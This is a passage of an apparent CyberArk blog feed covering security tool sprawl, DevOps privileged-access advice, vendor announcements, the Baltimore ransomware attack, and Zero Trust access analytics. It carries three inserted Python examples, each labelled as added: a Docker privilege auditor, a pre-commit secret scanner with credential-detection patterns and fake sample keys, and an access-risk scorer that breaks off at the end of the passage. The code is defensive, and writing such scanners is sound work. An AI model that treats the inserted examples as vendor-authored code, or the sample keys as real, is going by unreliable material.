Judging from the social media backlash about the “vendor circus” at major security conferences and events, there is some recognition and reflection about cyber tool sprawl.  When it comes to AI, machine learning and blockchain, we are often promised silver bullets – and told that we’re going to need them.  This creates a sense that, if you don’t deploy a vendor’s magical new solution, then you face an imminent failure to protect your company.

I recently learned of a smaller organization’s security leader who was proud to have acquired seven marquee threat detection tools, but when asked about how he had the ability to leverage them all effectively, he responded with, “I focus on the one that is giving me the most actionable data.” In other words, he was only actually using one threat detection tool at a time. The other six were still running and producing logs and alerts, but no one was looking at them.

What to do: Don’t expect your strategic architecture practices to start out fully mature.  Bring a deeply experienced, big picture security architect on board to develop an ecosystem of cyber security tools that work together and are appropriately scalable.  CISOs need to look past initial funding for “cool” tools toward more comprehensive total cost of ownership (for both internal and external resources), linkages to business scope, ability to drive down risk and plans for appropriate scale.

4. Solidify the basics

The basics matter.  It is difficult to achieve comprehensive risk reduction if you don’t have the fundamental concepts nailed down.  The Center for Internet Security Critical Security Controls (CIS CSC) lists inventory and control of hardware, inventory and control of software, continuous vulnerability management and controlled use of administrative privileges as the top four basic controls. However, many companies report incomplete or ineffective efforts in all four of these fundamental efforts.  Meanwhile, investments may be focused more on the “sexy” tools and controls that are popular in the market.

What to do: The solution is not to completely stop everything to catch up on the basics, but it does call for some ruthless prioritization and the rekindling of core efforts to ensure your team isn’t spread so thin working on shiny new tools that it obstructs progress on critical building blocks.

The CIS CSC provides a robust and periodically updated playbook.  They even recently segmented the first six controls into a grouping of Basic CIS Controls.  They include hardware and software inventory, vulnerability management, controlling admin privileges, secure configuration (hardware/software) and maintenance and monitoring of logs.  While they all seem essential for any security program, far too many companies do not have solid progress and maturity towards these.

Connecting the dots between prioritizing business risk and solidifying the basics, does your company leverage business risk to drive privileged access management programs?  Are the biggest risks being dealt with first, or are you using a first come, first served model that may not be most effective for your organization?

5. Get tools and capabilities to the appropriate scale

Buying a tool and not implementing it at scale to protect your business information assets does not drive risk reduction.  Far too often, a company will buy a tool (or 10), have some wins implementing some of the features and then either move on to the next thing or realize they don’t have resources to execute to scale or to support the tool after the initial investment money runs out.

What to do: Getting to the appropriate scale with these efforts is the only way to fully achieve the risk reduction that your money, time and effort will have cost you.

Scaling is hard.  It can be grueling at times.  However, it is where the magic happens with risk reduction.  Remember, “scale” doesn’t have to mean “turn it on everywhere.”  In fact, “appropriate scale” connects directly back to the business risks you are intending to reduce.

Companies that achieve appropriate scale leverage solid and consistent project management and measurement methodologies. They think proactively about total cost to achieve desired risk reduction, and they don’t cut and run when they see the next shiny object or tool their peer company decided to implement.  Since many CISOs only have a 17- to 24-month tenure, they may not be focusing on long-haul solutions at scale.

The flip-side precaution is that proven leaders (if they are using measurement tools) know when something is not working or performing to the desired outcomes.  In this case, cutting a project or capability may be warranted.  However, if this is the case, cut the entire capability and solution; don’t leave it running with a skeleton team keeping it alive.  This will cost in more ways than one in the long run.

Stay tuned for deeper dives on these topics!  You can reach me at askAaron@revealrisk.com with any questions or ideas on these topics or visit my LinkedIn page here.

Contribute Your Integration to CyberArk Marketplace for a Chance to Win https://www.cyberark.com/blog/contribute-your-integration-to-cyberark-marketplace-for-a-chance-to-win/ Sat, 15 Jun 2019 12:45:24 +0000 https://www.cyberark.com/?p=68511

CyberArk believes that cybersecurity is a team game. This is an important tenet in our approach to building technology partnerships that deliver measurable, long-term value to our customers through an integrated security stack. That’s why we’ve worked hard to grow CyberArk Marketplace, providing customers and partners with best-of-breed integrations, tools and scripts to extend the benefits of privileged access management (PAM) across their organizations to mitigate risk and evolve digital transformation strategies.

Since the launch of CyberArk Marketplace last year, we’ve nurtured an enthusiastic and fast-growing ecosystem of partners and customers, logging more than 13,000 privileged access management technology integration downloads to date.

Building on this momentum, we’re thrilled to announce that we’re expanding CyberArk Marketplace to support contributions from our expansive network of security professionals. The launch of community integrations enables CyberArk C3 Alliance members, strategic partners, customers and community contributors alike to submit and upload their own integrations with the CyberArk Privileged Access Security Solution, making it easier than ever to:

  • Showcase their company’s solutions and capabilities to the more than 10,000 monthly visitors.
  • Highlight their development expertise in key areas such as cloud, containers, DevOps and Robotic Process Automation.
  • Collaborate with other security professionals and tap into insights from the larger security community.
  • Make an impact in the fight against attackers while driving rapid customer value: integrations can be downloaded in just four clicks, giving organizations the speed and agility to further improve security and reduce risk.

Submit Your Integration by July 12 to Win the CyberArk Marketplace Impact Award

When you contribute integrations to CyberArk Marketplace, everyone benefits. From now until July 12, MVPs who contribute integrations with the greatest potential for impacting security have a chance to win the CyberArk Marketplace Impact Award.

Think you’ve got what it takes? Does your integration:

  • Take a unique approach?
  • Deliver distinct value or transformational experience?
  • Securely connect to high-value targets or devices?
  • Make significant downstream impact?

If so, submit your integration today for a chance to win!  The CyberArk Marketplace Impact Award winner will receive a $500 Amazon gift card, a CyberArk Marketplace Impact Award trophy, loads of CyberArk swag – and will be featured in a spotlight article on the CyberArk blog!

This contest is open to all current CyberArk customers and partners and contributing is simple. Just sign in to CyberArk Marketplace, click “My Contributions,” click “Contribute” and follow the wizard. It’s that easy! If your submission is accepted and published, you will be automatically entered for a chance to win the Marketplace Impact Award. To learn more about the contest, visit here.

We’re all in this together against a common enemy – cyber attackers. Now is the time to contribute to – and tap into – this fast-growing community’s collective brainpower and resources. Submit your integration today!

Top CISOs Share Steps to Prioritize DevOps Tools and Cloud https://www.cyberark.com/blog/top-cisos-share-steps-to-prioritize-devops-tools-and-cloud/ Thu, 13 Jun 2019 13:00:04 +0000 https://www.cyberark.com/?p=68437

Editor’s Note: Part 2 of a 5-part series on securing DevOps environments based on insights from Global 1000 Chief Information Security Officers in the CISO View report.

  1. Transform the security team into DevOps partners
  2. Prioritize securing DevOps tools and infrastructure
  3. Establish enterprise requirements for securing secrets and credentials
  4. Adapt processes for application testing
  5. Evaluate the results

The power of the DevOps toolchain and its associated privileged accounts and secrets makes it a top priority for security teams, along with protecting the development and production environments themselves. In The CISO View – Protecting Privileged Access in DevOps and Cloud Environments, published earlier this year, our panel of expert CISOs weighed in on their experiences securing key tools and infrastructure to help their organizations achieve successful DevOps outcomes and progress on their digital transformation journeys.

Here are five of their recommendations for how CISOs and their security teams should prioritize protection of DevOps tools and processes:

1. Set and enforce policies for the selection and configuration of tools. Since you can’t protect what you don’t know about, first take a full inventory of the DevOps tools being used by the development teams. While challenging, this is especially important for open source tools, since 58 percent of today’s businesses are utilizing open source heavily to flatten learning curves and speed release cycles. Once these tools are accounted for, conduct a thorough evaluation to identify any existing security deficiencies and address them promptly. For example, make sure tools are not being used in an insecure default configuration and that they are kept up to date.

When it comes to evaluating new tools, security teams should find a way to get a seat at the table by collaborating with the group responsible for tool selection and configuration (e.g., a COE or Engineering Council) or working closely with Procurement to select the best tools for the organization and establish enterprise security standards from the start.

2. Control access to DevOps tools. Since attackers may only need to exploit one vulnerability to carry out their mission, it’s important to address security requirements and potential vulnerabilities holistically. This starts by securing DevOps and cloud management tools’ secrets and credentials in an encrypted vault protected with multi-factor authentication (MFA). Provide just-in-time access so users can gain high-level access only when it’s needed to perform certain tasks – and ensure that this temporary usage is closely monitored. Additionally, limit access to high-risk commands within DevOps tools. For instance, Docker users often run a Docker container with the --privileged flag, which gives the container direct access to host elements. Ensure users are not able to run containers with this flag – and if it’s a “must,” severely limit user access and monitor and record all activities with the --privileged flag.

Follow other cyber hygiene best practices, such as setting up access controls that segregate DevOps pipelines so attackers cannot gain access to one and then move to another; ensuring that credentials and secrets are not shared between DevOps tool accounts and Windows sysadmin accounts and removing all unnecessary accounts with access to DevOps tools (i.e., accounts for developers who have changed roles, don’t actually require access to tools or have left the company).
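One way to check recommendation 2's rule against running containers, as an added example that is not code from the report or from CyberArk: it reads the JSON that docker inspect emits and flags containers started with --privileged, and goes one step beyond the flag by also reporting capability and PID-namespace grants that give comparable host access; the SAMPLE_INSPECT data and the RISKY_CAPS policy are constructed assumptions.

```python
"""Audit containers for --privileged and near-equivalent grants using the
JSON that `docker inspect` emits (HostConfig.Privileged, HostConfig.CapAdd,
HostConfig.PidMode). Added example, not code from the CISO View report."""
import json
import subprocess
import sys

# Capabilities that, when added, give roughly the host access --privileged does.
# Assumption: treat these as policy violations alongside the flag itself.
RISKY_CAPS = {"ALL", "SYS_ADMIN"}

# Constructed sample in the shape of `docker inspect` output (not real hosts).
SAMPLE_INSPECT = [
    {
        "Name": "/web-frontend",
        "Config": {"Image": "internal/web:1.4"},
        "HostConfig": {"Privileged": False, "CapAdd": None, "PidMode": ""},
    },
    {
        "Name": "/ci-runner",
        "Config": {"Image": "internal/jenkins-agent:2"},
        "HostConfig": {"Privileged": True, "CapAdd": None, "PidMode": ""},
    },
    {
        "Name": "/node-exporter",
        "Config": {"Image": "internal/exporter:0.9"},
        "HostConfig": {"Privileged": False, "CapAdd": ["CAP_SYS_ADMIN"], "PidMode": "host"},
    },
]


def normalise_cap(cap: str) -> str:
    """Docker reports capabilities as SYS_ADMIN or CAP_SYS_ADMIN depending on version."""
    cap = cap.upper()
    return cap[4:] if cap.startswith("CAP_") else cap


def audit(inspect_output: list) -> list:
    """Return one finding per container that violates the no-privileged policy."""
    findings = []
    for container in inspect_output:
        host_cfg = container.get("HostConfig") or {}
        reasons = []
        if host_cfg.get("Privileged"):
            reasons.append("--privileged")
        caps = {normalise_cap(c) for c in (host_cfg.get("CapAdd") or [])}
        if caps & RISKY_CAPS:
            reasons.append("--cap-add=" + ",".join(sorted(caps & RISKY_CAPS)))
        if host_cfg.get("PidMode") == "host":
            reasons.append("--pid=host")
        if reasons:
            findings.append({
                "name": container.get("Name", "").lstrip("/"),
                "image": (container.get("Config") or {}).get("Image"),
                "reasons": reasons,
            })
    return findings


def inspect_running() -> list:
    """Collect inspect JSON for every running container on this host."""
    ids = subprocess.run(["docker", "ps", "-q"], capture_output=True,
                         text=True, check=True).stdout.split()
    if not ids:
        return []
    raw = subprocess.run(["docker", "inspect", *ids], capture_output=True,
                         text=True, check=True).stdout
    return json.loads(raw)


if __name__ == "__main__":
    # `--demo` audits the constructed sample; otherwise the local Docker daemon.
    data = SAMPLE_INSPECT if "--demo" in sys.argv else inspect_running()
    findings = audit(data)
    for f in findings:
        print(f"{f['name']} ({f['image']}): {', '.join(f['reasons'])}")
    sys.exit(1 if findings else 0)
```

Run it from a scheduled job or a CI step so a non-zero exit surfaces any container that slipped past the policy.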

3. Reduce the concentration of privilege. Ensure least privilege by limiting each user’s level of access to DevOps tools to the minimum necessary for their role. But, don’t stop there. Configure DevOps tools to require dual authorization for certain critical functions. For instance, you can require that before a change to a Puppet manifest file goes live, a second person must review and approve the change. Additionally, implement separation of duties for build automation tools such as Jenkins, which often end up over-privileged and able to perform all duties without restriction – from building and testing to packaging. In the case of Jenkins, separate duties by implementing multiple Jenkins nodes, each dedicated to one function (build or test or package) for each application. Each node will have a unique identity and a limited set of privileges, which minimizes the impact of a potential compromise.

4. Ensure code repositories do not expose secrets. Develop risk-based policies for developers around the use of code repositories. Remember that, beyond credentials, code may contain details about the organization’s internal network that could be useful to attackers. If you can do so without adversely affecting workflow, use an on-premises rather than a cloud-based code repository. Scan the environment to make sure that any on-premises code repositories are inaccessible from outside the network. If cloud-based repositories are used, ensure they are configured to be private. Finally, before checking code into any repository, implement automated scanning to ensure code does not contain secrets.
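A pre-commit secret scan of the kind recommendation 4 calls for, as an added example rather than tooling from the report or from CyberArk: it scans the staged version of each file for known credential formats and falls back to an entropy check for opaque tokens, and exits non-zero to block the commit. The pattern set, the entropy threshold and the SAMPLE_FILES are constructed assumptions; the AKIA value is AWS's documented placeholder key ID.

```python
"""Pre-commit secret scan: refuse a commit whose staged files contain
credential-shaped strings. Added example, not the report's own tooling; the
pattern set and entropy threshold are assumptions to tune per organisation."""
import math
import re
import subprocess
import sys
from collections import Counter

# Known credential formats. The assignment rule catches password = "..." style
# literals; the AWS rule matches the documented AKIA... access key ID shape.
PATTERNS = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private-key-block": re.compile(r"-----BEGIN (?:[A-Z ]+ )?PRIVATE KEY-----"),
    "assignment-secret": re.compile(
        r"(?i)(?:password|passwd|secret|api[_-]?key|token)\s*[:=]\s*['\"][^'\"]{8,}['\"]"
    ),
}
# Opaque tokens with no known format are reported on entropy alone.
TOKEN_RE = re.compile(r"[A-Za-z0-9+/=_-]{32,}")
ENTROPY_THRESHOLD = 4.5  # bits per character (5.0 is the max for 32 distinct chars)

# Constructed staged files for the demo; the key is AWS's documented example ID.
SAMPLE_FILES = {
    "config/settings.py": (
        'DB_HOST = "db.internal"\n'
        'DB_PASSWORD = "hunter2hunter2"\n'
        'AWS_KEY = "AKIAIOSFODNN7EXAMPLE"\n'
    ),
    "deploy/id_rsa": "-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructedbody\n",
    "build/token.txt": "Zq9xT2vLm8pR4wKn7bYc3eHs6dFg1jAu\n",
    "README.md": "BUILD_ID = 0000000000000000000000000000000000000000\n",
}


def shannon_entropy(s: str) -> float:
    """Bits per character; random base64-like secrets score well above prose."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_text(path: str, text: str) -> list:
    """Return findings as (path, line number, rule name) for one file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        matched = [name for name, rx in PATTERNS.items() if rx.search(line)]
        if not matched:  # entropy is the fallback, not a second hit on the same line
            matched = [
                "high-entropy-token"
                for tok in TOKEN_RE.findall(line)
                if shannon_entropy(tok) >= ENTROPY_THRESHOLD
            ][:1]
        findings.extend((path, lineno, rule) for rule in matched)
    return findings


def scan_files(files: dict) -> list:
    """Scan a mapping of path -> file content and concatenate the findings."""
    return [f for path, text in files.items() for f in scan_text(path, text)]


def staged_files() -> dict:
    """Read the staged (index) version of each added/changed file via git."""
    def run(*cmd):
        return subprocess.run(cmd, capture_output=True, text=True,
                              errors="replace", check=True).stdout
    names = run("git", "diff", "--cached", "--name-only", "--diff-filter=ACM").split()
    return {name: run("git", "show", f":{name}") for name in names}


if __name__ == "__main__":
    # `--demo` scans the constructed sample; otherwise the git index.
    files = SAMPLE_FILES if "--demo" in sys.argv else staged_files()
    findings = scan_files(files)
    for path, lineno, rule in findings:
        print(f"{path}:{lineno}: {rule}")
    sys.exit(1 if findings else 0)  # non-zero blocks the commit when used as a hook
```

Install it as .git/hooks/pre-commit (or run it in CI against the merge base) so the check happens before the secret reaches any repository.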

5. Protect and monitor infrastructure. Cyber attackers seek the path of least resistance. Often, a well-crafted phishing email will do the trick, so make sure that all workstations and servers undergo regular patching, vulnerability scanning and security monitoring. Additionally, monitor your cloud infrastructure for signs of unusual credential usage or configuration changes (such as making private data stores public). Ensure VM and container images used in development and production environments come from a sanctioned source and are kept up to date. To ensure security remains “baked in” to countless rounds of automatic rebuilds, security teams should work with their DevOps counterparts to automate the configuration of VMs and containers so that, when a new machine or container is spun up, it is automatically configured securely and given appropriate controls – without requiring human involvement.

Want to dig in deeper? Download the full CISO View report, watch a brief highlights video, tune-in to our related webinar or check out our post on aligning security and DevOps teams. And watch this space for our next installment covering tips for establishing enterprise requirements for securing DevOps secrets and credentials.

Forrester Recognizes Idaptive As A Leader In New The Forrester Wave: Identity-as-a-Service For Enterprise Report https://www.cyberark.com/blog/forrester-recognizes-idaptive-as-a-leader-in-new-the-forrester-wave-identity-as-a-service-for-enterprise-report/ Wed, 12 Jun 2019 18:26:32 +0000 https://www.cyberark.com/?p=99582

Idaptive is leading the IDaaS market, cited for the solution that emphasizes “identity threat intelligence and device posture and management capabilities”

This week we are honored to share that Forrester has recognized Idaptive as one of only two leaders in The Forrester Wave™: Identity-as-a-Service For Enterprise, Q2 2019 report. We believe being named a Leader reflects the success that our customers and partners achieve using the Idaptive Next-Gen Access Platform to secure access to their applications and delight their users. We’re proud of this achievement because it confirms that Idaptive uniquely addresses our customers’ needs with an innovative platform that provides single sign-on (SSO) and adaptive multi-factor authentication (MFA), in addition to user behavior analytics (UBA), user lifecycle management (LCM) and endpoint management (EMM) capabilities.

Report Highlights

In this report, Forrester assessed ten identity and access management solutions against 37 criteria such as access management policy administration, mobile IDaaS functionality, and solution APIs. In addition to naming us a Leader, citing the strength of our solution functionality and strategy, Forrester highlighted Idaptive for offering APIs and broad support for self-service capabilities.

Security and risk professionals should look for IDaaS solutions that “…expose full IDaaS functionality in native mobile applications, master API security and solution APIs, and maintain a broad, international implementation partner ecosystem,” according to the Forrester report.

In the Idaptive vendor profile, the Forrester analyst team wrote:

“…Idaptive has been maintaining its inherited security certifications, emphasizing its identity threat intelligence and device posture and management capabilities. The solution has a granular and flexible SaaS app access policies, and a provisioning workflow for SaaS cloud applications. It has a modular, building-block-based authentication support, and it’s easy to add new TOTP/HOTP tokens. APIs are documented and flexible for IDaaS policy management and outbound integration.”

Although the report identifies some features currently not present in the Idaptive cloud directory and notes that productized Microsoft Azure and Google GCP admin console and role provisioning support are not available, Idaptive is developing these features and plans to release them later this year.

Next-Gen Access Management: The Intelligent Choice

Our comprehensive Next-Gen Access Cloud adds a layer of intelligence which helps companies verify and validate users, devices, and services while continuously learning from, and adapting to, millions of risk factors.

With Idaptive, companies know their sensitive information is secure, and users can access the apps and services they need with less friction and frustration. In addition, the Idaptive Next-Gen Access Cloud enables users to:

  • MANAGE IDENTITY WHERE YOU CAN CONTROL AND SECURE IT: Idaptive is the only Leader that does not require synchronization of the identity repository with Idaptive Cloud Directory. This provides you the flexibility and confidence of being able to secure and control identity data in a directory of your choice, with the tools and technologies of your choice.
  • SECURE THE HYBRID ENTERPRISE: Idaptive is the only Leader that is consistently delivering on our promise of supporting a hybrid enterprise with our comprehensive support of modern cloud-based apps and on-prem legacy apps.
  • ACT ON INTELLIGENCE: Idaptive is the only Leader that has a machine learning user behavior analytics engine, with an extensive data visualization toolset for descriptive and predictive identity analytics. Idaptive collects user activity data from our own service, as well as third-party SIEMs and threat intelligence platforms, and leverages unsupervised machine learning to develop user behavior models. These models are continuously updated as more data is ingested, which makes our models accurate and effective in acting on malicious user behavior.

Looking Ahead

We are grateful to our customers who participated in this study and gave us their vote of confidence. We are committed to building the best identity and access management platform for our customers. For example, we will continue to expand our service to empower developers by building new SDKs for mobile and web platforms, offer extensible identity lifecycle management to support provisioning into on-prem applications, and provide deeper analytical insights by collecting anonymized data from our cloud tenants to discover malicious IP addresses and detect anomalous behaviors.

Download The Forrester Wave™: Identity-as-a-Service For Enterprise, Q2 2019 here.

[1] The Forrester Wave™: Identity-as-a-Service For Enterprise, Q2 2019, Forrester, Inc., June 12, 2019

CyberArk Introduces Privileged Access Security Assessment Tool https://www.cyberark.com/blog/cyberark-introduces-privileged-access-security-assessment-tool/ Tue, 11 Jun 2019 13:00:04 +0000 https://www.cyberark.com/?p=68261

Privileged access management (PAM) is a key pillar of an effective security program. We take our role as a trusted adviser to our customers very seriously and are constantly looking for new ways to help evolve existing privileged access management programs – or guide organizations that are getting started – to prioritize risk and identify opportunities to measure success and demonstrate quantifiable value to the business. CyberArk has interviewed hundreds of organizations, including customers and those who have not yet adopted a privileged access management solution, to determine the biggest hurdles companies face when it comes to privileged access management and what they need to overcome them. We found three key trends:

  • Organizations, especially those with resource constraints (basically every company, everywhere), struggle to identify the security goals that provide the most security value to their business in terms of both cybersecurity risk reduction and ROI.
  • Companies that adopted a PAM solution were able to accomplish the goals they originally set out to achieve, but they didn’t know where to go next to continue improving their security. They often spoke of “best practice” programs they wanted to follow, but had difficulty applying those programs in a way that provided tangible outcomes specific to their needs.
  • Organizations are looking for cybersecurity tools that provide clear advice, backed by quantitative methods to help guide them along their security journey.

CyberArk is proud to introduce the CyberArk Privileged Access Security Assessment Tool to guide organizations across all three fronts.

During an assessment, a technical expert from CyberArk or one of our certified partners will sit with your team, walk you through the process with the assessment tool and discuss how your organization is protecting privileged accounts and access today. We frame this conversation on the CyberArk Privileged Access Security Cyber Hygiene Program, which defines seven goals organizations should strive to accomplish to build a comprehensive program to secure privileged access. Based on our findings, the CyberArk Privileged Access Security Assessment Tool will deliver three outputs that will inform not only your technical teams, but also business and IT leaders who are becoming increasingly interested in what security teams are doing to protect the brand.

Output 1: Privileged Access Security Score

[Figure: Security score and evaluation history from the Privileged Access Security Assessment tool]

You can think of the privileged access security score as similar to a FICO or NPS score in that it reflects concrete metrics and can be tracked over time. The score is based on feedback provided to assessment and evaluation criteria developed by CyberArk. The Privileged Access Security Score is something tangible that organizations and security leaders can use to demonstrate the progress they’ve made in building a strong privileged access management program.

Output 2: Rich comparison data

[Figure: Comparison data from the Privileged Access Security Assessment tool]

The rich comparison data provides a comparison against peers based on industry, company revenue, number of employees and a variety of other distinctions. We call this collection of attributes a reference group. This data is crucial for leaders interested in understanding how their investment compares to others in their reference group.

Output 3: Assessment report, complete with specific recommendations

For companies that have completed an assessment already, this output has been cited as the most significant in terms of direct value to the business. The assessment report provides companies with a recap of their most recent assessment, a visual history of their assessments, the comparison data from above and, most importantly, specific advice based on their individual feedback.

We give companies technical and process recommendations for two of the seven goals of the assessment. These are the areas they should prioritize in the next 12-24 months, and the assessment report clearly defines the actions to take to improve privileged access management and protect your organization’s business.

Read the press release to learn more about how the industry, including leading cyber security insurance firms, is leveraging the Privileged Access Security Assessment Tool from CyberArk. Get started by filling out a request form or by reaching out to your CyberArk representative.


]]>
A Troubled City Reminds Us That Ransomware Is Here to Stay https://www.cyberark.com/blog/a-troubled-city-reminds-us-that-ransomware-is-here-to-stay/ Thu, 06 Jun 2019 13:00:30 +0000 https://www.cyberark.com/?p=68006 Ransomware attack

Since early May, Baltimore has been crippled by a massive ransomware attack that has held many of the city’s IT systems hostage. The attack has effectively “frozen” thousands of government computers, causing everything from real estate sales delays to water bill payment disruptions.

The cyber attackers responsible for the attack have demanded 13 bitcoins — worth about $100,000 – in order to restore these systems. Baltimore City Mayor Jack Young has publicly stated that the city will not pay the ransom demand, but even though the FBI, Secret Service and a host of cybersecurity experts are working around the clock to get things back to normal, new reports indicate the attack will ultimately cost the city more than $18 million.

Just this week, a Krebs on Security post quotes a source who says “it’s not terribly likely” that the Eternal Blue exploit was used to propagate the Robbinhood ransomware, debunking earlier reports that linked the Baltimore ransomware attack to the hacking tool developed by the U.S. National Security Agency (NSA) and leaked online in 2017.

Ransomware Attacks Against State and Local Governments On the Rise

According to the latest Verizon DBIR report, ransomware accounts for nearly 24 percent of all malware-related attacks across industries. Meanwhile, a 2019 Beazley Group breach insights report notes a staggering 105 percent spike in ransomware notifications from the first quarter of 2018 to the same period this year. Payment demands are also increasing significantly. The Beazley report indicates that the average payment in the first quarter of 2019 – $224,871 – has already far surpassed 2018’s total of $116,324.

As evidenced by the Baltimore attack, state and local governments seem to be particularly vulnerable to ransomware. Cybersecurity research firm Recorded Future recently published an interesting study on the surge in state and local government ransomware attacks targeting essential infrastructure and processes, which revealed that reported attacks on state and local government skyrocketed by 39 percent in 2018. Some additional findings include:

  • At least 169 county, city or state government systems have been attacked since 2013, including at least 45 police and sheriff’s offices.
  • These attacks hit 48 out of 50 states, as well as Washington D.C.
  • Twenty-four of these attacks were against local school systems or colleges.
  • The primary ransomware families used for ransomware attacks in the past 24 months were GandCrab and Ryuk.
  • Many of these attacks were opportunistic: In many cases, attackers “stumbled” upon public-sector entities when looking for vulnerable targets. However, once they were identified, the attackers focused on these targets, recognizing the potential for notoriety and heavy media coverage.

[Figure: State and local government ransomware attacks. Source: Recorded Future]

Since the conclusion of the Recorded Future study in April 2019, several new ransomware attacks against state and local governments beyond Baltimore have made headlines – from Lynn, Massachusetts to Cartersville, Georgia. It’s safe to say that these types of attacks are not going away any time soon.

Four Tips for Mitigating Risk of Ransomware Attacks

While there is no silver bullet for ransomware prevention, there are a number of steps government agencies and enterprises alike can take to dramatically reduce the risk of malware such as Robbinhood spreading and wreaking major havoc.

  1. Backup all critical data. Sure, it seems like cybersecurity 101, but it’s amazing how many organizations don’t do this on a regular basis. Prioritize data that is critical to your organization and consistently back it up so that if files are locked and held for ransom, you can still keep (at least parts of) your business running.
  2. Never stop patching. Consistently patching endpoints and servers will dramatically reduce the attack surface, making a compromise far less likely. If you haven’t already, stop what you’re doing and immediately disable the (very) outdated Microsoft SMB protocol version 1 or apply patch MS17-010. And don’t stop there. Patch all vulnerable software regularly to help prevent ransomware infections – and make sure your antivirus, firewall and other perimeter protection tools are always up to date.
  3. Beware of phishing. According to the Verizon DBIR report, phishing is involved in 32 percent of today’s breaches and 78 percent of cyber-espionage incidents. Attackers often begin their malware attacks through targeted phishing campaigns. If you receive an unsolicited call, email, text message or chat, do not respond or click on any links – even if the person claims to be from a legitimate department – before confirming legitimacy.
  4. Remove local admin privileges to contain and block attacks. While employee education around phishing is important, it cannot stop there. Removing local administrator rights is the foundation of effective endpoint security. By implementing a combination of least privilege and application control policies on endpoints and servers as part of a larger Zero Trust approach, you can mitigate the risk of malware like Robbinhood spreading from its initial infection point. Based on testing by CyberArk Labs, the removal of local administrator rights, combined with application control and greylisting, was 100 percent effective in preventing ransomware from encrypting files.

Traditional antivirus/next-generation antivirus or endpoint detection and response solutions cannot block ransomware on their own. CyberArk Endpoint Privilege Manager adds a critical layer of protection to strengthen your organization’s existing endpoint security toolset, allowing you to contain attacks, such as malware and ransomware, at the endpoint. With out-of-the-box policy definition for ransomware protection – including comprehensive least privilege controls tested on hundreds of thousands of malware samples – you can effectively block the spread of malware across your network, dramatically reducing remediation time and effort.

Don’t wait until your organization is front-page news and locked out of critical systems. Take proactive steps to protect privilege on the endpoint and contain attacks early in their lifecycle. Learn more in our solution brief or in this short video.


]]>
The Future of Cybersecurity is Artificial: Intelligence Will Transform Enterprise Governance https://www.cyberark.com/blog/the-future-of-cybersecurity-is-artificial-intelligence-will-transform-enterprise-governance/ Thu, 30 May 2019 19:31:15 +0000 https://www.cyberark.com/?p=98918

Over the past several weeks, I’ve explained how to verify every user and then validate their devices as part of a Zero Trust approach to cybersecurity. Now, it’s time to tie everything together with the final ingredient of the Zero Trust formula: intelligently limiting user access.

What do we mean by “intelligently limiting access”? Well, not all people need the same access to the same systems and applications. Some people (like HR or Finance) handle sensitive, private data, others don’t. Some people travel a lot with their job, some almost never. You get the gist. When you intelligently limit access to an organization’s systems and applications, you’re making it easy for each person — whether employee, partner, customer, etc. — to access what they need, when they need it, wherever they are, and on the device of their choosing.

Rise of the Machines

Modern machine learning and user-based analytics can transform how you intelligently limit access, ultimately helping strike a balance between security and productivity.

Information about the user, endpoint, application or server, policies, and all activities related to them can be collected and fed into a data pool that fuels machine learning. This system can then automatically recognize out-of-the-ordinary behaviors, such as a user trying to access resources from an unusual location, which immediately raises a red flag requiring additional authentication or blocked access.

By feeding every access attempt back into an analytics platform, you can apply modern machine learning to build individual profiles for every user. Picture this: a user logs into her laptop using Multi-factor Authentication (MFA), while working from the corporate network, on a registered device she always uses, accessing the same apps she always does, at the same time of day as always. Great! You can confidently provide her easy access through single sign-on to her app instead of prompting her for additional verification.

Machine learning can greatly reduce the complexity of the analysis that must be performed by the IT staff responsible for overseeing access controls. Instead of writing complicated rules, IT can decide how to respond to the risk level of an access attempt, saving a great deal of time and frustration.
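The passage above describes the mechanism in outline: build a baseline per user from past access attempts, score each new attempt by how far it departs from that baseline, and let IT choose a response per risk band rather than author rules per user. The following is an added example (not code from the original post, and not Idaptive's or CyberArk's implementation) that carries that idea through in Python with a deliberately simple frequency-count baseline instead of a trained model. The users, devices, location codes, apps, risk weights and thresholds are all constructed for illustration.

```python
"""Risk-scored access decisions from a per-user behavioural baseline.

Added example for illustration; the events, weights and thresholds are
constructed and are not a vendor's product logic.
"""
from collections import Counter
from dataclasses import dataclass, field


@dataclass
class AccessEvent:
    user: str
    device_id: str   # registered-device identifier
    location: str    # coarse location code, e.g. an office or country
    app: str
    hour: int        # local hour of day, 0-23
    mfa: bool        # True if this session already passed MFA


@dataclass
class UserProfile:
    """Frequency counts of what a user has historically done."""
    devices: Counter = field(default_factory=Counter)
    locations: Counter = field(default_factory=Counter)
    apps: Counter = field(default_factory=Counter)
    hours: Counter = field(default_factory=Counter)

    def learn(self, ev: AccessEvent) -> None:
        self.devices[ev.device_id] += 1
        self.locations[ev.location] += 1
        self.apps[ev.app] += 1
        self.hours[ev.hour] += 1


def build_profiles(history):
    """Fold every past access attempt into its user's profile."""
    profiles = {}
    for ev in history:
        profiles.setdefault(ev.user, UserProfile()).learn(ev)
    return profiles


# Constructed weights: how much each deviation from the baseline adds.
WEIGHTS = {"unknown_device": 40, "unusual_location": 30,
           "off_hours": 20, "new_app": 10}

# Constructed risk bands: IT tunes these instead of writing per-user rules.
ALLOW_BELOW = 20   # below this: single sign-on, no extra prompt
BLOCK_AT = 60      # at or above this: refuse the attempt


def score(ev, profile):
    """Return (risk 0-100, list of reasons). No baseline => maximum risk."""
    if profile is None:
        return 100, ["no_baseline"]
    reasons = []
    if ev.device_id not in profile.devices:
        reasons.append("unknown_device")
    if ev.location not in profile.locations:
        reasons.append("unusual_location")
    if ev.hour not in profile.hours:      # an hour this user never worked
        reasons.append("off_hours")
    if ev.app not in profile.apps:
        reasons.append("new_app")
    risk = min(sum(WEIGHTS[r] for r in reasons), 100)
    return risk, reasons


def decide(ev, profiles):
    """Map the risk band to an action: allow_sso, step_up_mfa or block."""
    risk, reasons = score(ev, profiles.get(ev.user))
    if risk < ALLOW_BELOW:
        action = "allow_sso"
    elif risk < BLOCK_AT:
        # Already-verified sessions need no second prompt in the middle band.
        action = "allow" if ev.mfa else "step_up_mfa"
    else:
        action = "block"
    return action, risk, reasons


# Constructed history for one user: same laptop, same office, same apps,
# working hours only.
HISTORY = [
    AccessEvent("alice", "L-1001", "BOS", "crm", 9, True),
    AccessEvent("alice", "L-1001", "BOS", "mail", 10, True),
    AccessEvent("alice", "L-1001", "BOS", "crm", 14, True),
]
PROFILES = build_profiles(HISTORY)

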